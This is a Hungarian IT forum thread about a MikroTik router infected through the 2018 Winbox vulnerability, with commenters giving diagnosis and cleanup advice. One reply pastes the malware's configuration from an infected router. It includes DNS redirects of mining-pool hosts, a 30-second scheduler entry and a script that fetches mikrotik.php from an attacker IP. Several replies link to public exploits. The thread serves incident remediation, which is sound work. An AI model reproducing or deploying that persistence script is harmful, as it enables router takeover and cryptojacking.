Egy közeli ismerősöm üzemeltet két irodai rendszert, amelyek Mikrotik 750g routerekkel VPN-nel vannak összekötve. Az egyik router mögött minden rendben van, a másik mögött azonban bármelyik böngészőt használva, bármelyik sz.gépen a meglátogatni kívánt oldalak helyett sokszor valami olyasmi jön, hogy:
avast; Fenyegetés ártalmatlanítva; Biztonságosan megszakítottuk a kapcsolatot stb.
E router mögött egy laptop is ezt produkálja, de ha a kolléga hazaviszi, akkor ott nem jelentkezik a probléma.
Aki korábban konfigurálta a routereket külföldre ment. Ha valaki tudna segíteni, akár a helyszínen is, magánban is megkereshet.
- 4941 megtekintés
Hozzászólások
Siman lehet fals riasztás, az avast nem egy biztonsagtechnikai referencia termék. Csekkold valami mással is!
--
"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség
- A hozzászóláshoz be kell jelentkezni
Ha nem volt frissítve az elmúlt félévben, akkor elég valószínű, hogy fertőzött: https://thehackernews.com/2018/08/mikrotik-router-hacking.html
Érdekesség: shodan jelenleg 524 magyararoszági, crypto-miner mitm-el fertőzött, publikus ip-ről elérhető mikrotik router-t tart nyilván: https://www.shodan.io/search?query=mikrotik+http.component%3Acoinhive+c…
- A hozzászóláshoz be kell jelentkezni
Elsőre nézd meg benne a tűzfal szabályokat. Ha találsz egy rakat üzenetet ismeretlen szabályok komment mezőjében akkor reset.
- A hozzászóláshoz be kell jelentkezni
A log mutat vmi? Tűzfal beállítások? Vannak esetleg nem oda illő fájlok a router-en? Érdemes lenne a jelenlegi beállításokat lementeni/exportálni és teljesen reset-elni a router-t, majd frissíteni (ros/firmware) és elkezdeni előröl a konfigurálást. Tűzfalnál a szokásos szabály: mindent tiltunk kivéve amit engedünk. A felesleges szolgáltatásokat is tiltani kell a router-en: https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
- A hozzászóláshoz be kell jelentkezni
Azt az avastot és úgy általában minden A betűvel kezdődő vírusirtót felejts el!
Brutál módon megfogja a gépet, minden szarra fals pozitív riasztásai vannak, random windows szolgáltatásokat fog meg és az összes kártevő bejön mellette.
Nem lehet, hogy a vpn-en megy át a komplett irodai web forgalom?
- A hozzászóláshoz be kell jelentkezni
- A hozzászóláshoz be kell jelentkezni
És Te vakon hiszel ezekben a tesztekben, vagy ki is próbálod az általad üzemeltetett környezetekben?
Én megadtam nekik az esélyt, de az Avast, az Avira és az AVG is elvéreztek, ha Windowsra ingyenes kell akkor Windows Defender.
- A hozzászóláshoz be kell jelentkezni
Mikrotik verzió?
mikrotik.php a schedulerben?
- A hozzászóláshoz be kell jelentkezni
Márciusban lett frissítve, 6.41.3-ra.
--
eutlantis
- A hozzászóláshoz be kell jelentkezni
Az kevés. https://github.com/BasuCert/WinboxPoC - "all versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable"
és ez csak egy exploit.
- A hozzászóláshoz be kell jelentkezni
+1
Azért elég szégyen, hogy így ki lehet olvasni a jelszót távolról :-o
Talán 15éve a DrayTek routerben volt ilyen bug utoljára (emlékeim szerint)
- A hozzászóláshoz be kell jelentkezni
Frissítsen RouterOS-t.
https://www.exploit-db.com/exploits/44283/
Némely támadó botnet állítólag olyan módosítást végzett benne, amely az átmenő HTTP forgalomba csempészett saját tartalmat.
- A hozzászóláshoz be kell jelentkezni
ha jól értelmezem, az úgy működik, hogy a routerre a web-proxy mappába betölt valami cuccot, és
valami módon átirányít ide. na ez fertőzi meg.
- A hozzászóláshoz be kell jelentkezni
"Egy közeli ismerősöm üzemeltet ..."
- A hozzászóláshoz be kell jelentkezni
"Egyszer, amikor az egyik ismerősöm a bőrgyógyászaton.." (Nem, nem én voltam és nem a nemibeteg-gondozóban)
--
God bless you, Captain Hindsight..
- A hozzászóláshoz be kell jelentkezni
</strong></strong>
--
"Sose a gép a hülye."
- A hozzászóláshoz be kell jelentkezni
:)
- A hozzászóláshoz be kell jelentkezni
nem minden hős visel köpenyt
- A hozzászóláshoz be kell jelentkezni
Na jo nem szorakozok...
- A hozzászóláshoz be kell jelentkezni
Frissítsétek meg. Csak rá kell másolni a szükséges fájlt, és újraindítani.
- A hozzászóláshoz be kell jelentkezni
Biblia, korán, egyéb vallásos tárgy, talizmán, gyerekkori szerencse plusfigura (kinek mi) legyen a közelben. :)
De valóban, többnyire a frissítés szokott működni egyszerű confignál.
- A hozzászóláshoz be kell jelentkezni
Eddig még nem buktam bele. Kellemetlen lenne az ország másik felébe kocsikázni, mindenesetre ilyet nem csinálol munkaidő vége felé (inkább reggel), pláne nem pénteken. :)
- A hozzászóláshoz be kell jelentkezni
Eddig még nem buktam bele. Kellemetlen lenne az ország másik felébe kocsikázni, mindenesetre ilyet nem csinálol munkaidő vége felé (inkább reggel), pláne nem pénteken. :)
- A hozzászóláshoz be kell jelentkezni
Az lenne a legtutibb, ha egy tuti jó konfig mentést is rátöltenétek, mert beírhatja magát a scedulerbe és a scriptek közé valamint a tűzfalszabályokba is.
- A hozzászóláshoz be kell jelentkezni
Köszönöm az eddigi érdemi hozzászólásokat. Egy kis ideig eltart, amíg feldolgozzuk, kipróbáljuk a javaslatokat.
--
eutlantis
- A hozzászóláshoz be kell jelentkezni
Nézz be a Firewall -> Filter részlegbe furcsa szabályokért, nézz rá, hogy a Service-ek közül tényleg tilva van-e amit szeretnél, tegyél be minimum egy olyan filtert, ami csak lokálról engedi adminisztrálni az eszközt stb.
- A hozzászóláshoz be kell jelentkezni
https://mikrotik.com/download - 6.43.2. a legfrissebb jelenleg
- A hozzászóláshoz be kell jelentkezni
1. Export parancs futtatása parancssorból. Innen elég gyorsan kiderül hogy fertőzött e
2. Régi konfig visszatöltése
3. Firmware upgrade
Ilyeneket találtam pl:
/ip dns static
add address=185.206.144.149 name=asia1.ethermine.org
add address=185.206.144.149 name=asia1.ethpool.org
add address=185.206.144.149 name=asia1.fullhashed.com
add address=185.206.144.149 name=asia2.ethermine.org
add address=185.206.144.149 name=cn.sparkpool.com
add address=185.206.144.149 name=aurorapool.net
add address=185.206.144.149 name=daggerhashimoto.br.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.eu.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.hk.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.in.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.jp.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.usa.nicehash.com
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=
"/tool fetch address=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
- A hozzászóláshoz be kell jelentkezni
Köszönjük a segítséget. Az új firmware rátöltése megoldotta a problémát.
--
eutlantis
- A hozzászóláshoz be kell jelentkezni
A Routerboard-ot (bootloader) is frissítettétek? New terminal -> /system routerboard upgrade ,és utána /system reboot.
- A hozzászóláshoz be kell jelentkezni
- A hozzászóláshoz be kell jelentkezni
Lehet hogy csak azért, mert a gyártó javasolja.
- A hozzászóláshoz be kell jelentkezni
azért ennek ne dőljünk be automatikusan. A "gyártó" még az egyszerűen reprodukálható hiba esetén is azzal kezdi, hogy clear-config, legújabb ROS verzió, újra beállít - így is fennáll-e a hiba. :-)
- A hozzászóláshoz be kell jelentkezni
baszki zárjátok már le a code tageket.
- A hozzászóláshoz be kell jelentkezni
> Frissítsétek meg. Csak rá kell másolni a szükséges fájlt, és újraindítani.
Úgy érted, hogy licensz kulcs export, teljes NAND formatálás bootloader-ből, NETINSTALL-al újratelepítés tiszta forrásból, majd konfig visszaállítása? ;)
- A hozzászóláshoz be kell jelentkezni
Ennyire azért nem veszélyes a dolog.
* Package és Firmware upgrade
* Kikapcsolt Drop szabályok visszakapcsolása
* Script törlése és ütemezőből kivenni
* mikrotik.php törlése
* IP SOCKS kikapcsolása (ezt sokan elfelejtik)
- A hozzászóláshoz be kell jelentkezni
web-proxy kikapcsolasa... (ezzel terjed a crypto miner)
nem utolsosorban pedig beallitod, hogy a management portok csak trusted source -bol legyenek elerhetok.
plusz frissites 6.43-ra legalabb - innentol nem cleartext-ben tarolja a jelszavakat...
- A hozzászóláshoz be kell jelentkezni
Ja, az kimarad.
Mondjuk nekem eleve nem érhető el kintről (egy helyet leszámítva), előbb be VPN-ezek bentre, aztán onnan érem el. Ha nem tudok bejutni VPN-el, akkor kb nincs internet, tehát nem érném el amúgy sem kintről, ha meg elérem akkor meg tudom tekergetni így is. :)
- A hozzászóláshoz be kell jelentkezni
annyi megjegyzés hogy tiszta rendszerhez a config visszaállítás semmiképp sem backup állomány visszatöltése, hanem exportált rsc -ből visszaállás sorról sorra ellenőrizve.
- A hozzászóláshoz be kell jelentkezni
Még egyszer köszi. Ez lett:
winboxban:
system - package - check for update - update
majd a wincsiről a március mentés
files - upload - restore
---
restore után jelenleg ez van:
mikrotik.php-t nem láttam hogy lenne
a web proxy ki van kapcsolva
scheduler üres
ip - socks üres
--
eutlantis
- A hozzászóláshoz be kell jelentkezni
> PoC Attack Escalates MikroTik Router Bug to ‘As Bad As It Gets’
> Researchers say a medium severity bug should now be rated critical because of a new hack technique that allows for remote code execution on MikroTik edge and consumer routers.
> While MikroTik patched CVE-2018-14847 in early August, a recent scan by Tenable Research revealed only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. MikroTik’s RouterOS powers the company’s business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.
https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-b…
- A hozzászóláshoz be kell jelentkezni
A családban találtam egy hAP lite-ot ami fel van törve, ebbe konkrétan belépni sem tudok.
Esetleg van valakinek infója, hogy mire változik az admin user jelszava? Kíváncsi vagyok mit műveltek benne.
- A hozzászóláshoz be kell jelentkezni
Ha mázlid van, lentebb megtalálhatod a scriptet ami kiolvassa a jelszót. Mármint úgy értem, ha mázlid van, működni is fog.
Ha nincs, akkor reset, backup visszatölt.
- A hozzászóláshoz be kell jelentkezni